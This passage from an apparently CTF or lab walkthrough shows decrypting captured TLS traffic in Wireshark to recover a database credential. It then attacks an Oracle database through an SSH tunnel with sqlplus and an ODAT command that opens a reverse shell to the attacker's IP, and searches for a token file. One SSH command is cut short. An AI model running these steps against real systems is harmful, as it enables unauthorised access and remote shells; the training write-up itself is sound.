As can be seen in the above diagram, DB system is mentioned in the network, but JavaDev is not there. JavaDev is not a separate system the token for this system is hidden in some other files which can be found in a specific system. Attacking the JavaDev: As we remember, we found a debug folder from SSH system that folder contains a log file and pcap file captured by Wireshark.
We opened the debug.txt file, and we found it is a HTTPS encrypted traffic.
On the same text file, we scroll down, and we found Client Nonce and Master Secret key
After Googling about both keys, we found that SSL traffic can be decrypted by using Wireshark. Before that we saved the both key in separate text file key.txt like this format: CLIENT_RANDOM 56448610b995cc0f8100560fcf0cf8be7330b2d2f31d86a4259e1ec102f76c50 7cda1b7081ae8a7fae76ca71fbc704ec24796ce5c1f53a15f16325b33946544fd0b1dabde4db187504a74c1138d163bf
Open wireshark then go to File > Preferences
Then select SSL from the protocol section.
Browse for the text file where we have saved our client and nonce key and press OK.
Now load that pcap file in the wireshark.
Now go to Analyze > Decode As
Select SSL from the list.
Now click on Client Hello string and Analyze > Follow SSL Stream.
And we found the token for the JavaDev and also credential for Database: instance:XE user:TESTER1 password:Token_Java_dev_hydrogen1
Attacking the DB: Before attacking this system, we need two things in our system — Oracle support in Metasploit: https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux( install 11.1 version only)
ODAT(Oracle Database Attack Toolkit): https://github.com/quentinhardy/odat
Once we configure both tools in the system, we need to create an SSH tunnel to connect to DB, notice in the network diagram that there is an SSH icon, and it is in a different network. Command usage: ssh -nNT -i
Now for connecting to the Database, we have the instance, username, and password which we found from the JavaDev. Type in the following command: sqlplus ‘TESTER1/Token_Java_dev_hydrogen1@(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(Host=127.0.0.1)(Port=9000))(CONNECT_DATA=(SID=XE)))’
Now we will use the ODAT tool. Type in : ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 –reverse-shell 10.10.81.190 443
After running the command, it drop the shell access and then simply find the token by using find -name “token” and the output will be /u01/app/oracle/product/11.2.0/xe/token.txt Reference: https://www.trustwave.com/Resources/SpiderLabs-Blog/How-To-Decrypt-Ruby-SSL-Communications-with-Wireshark/
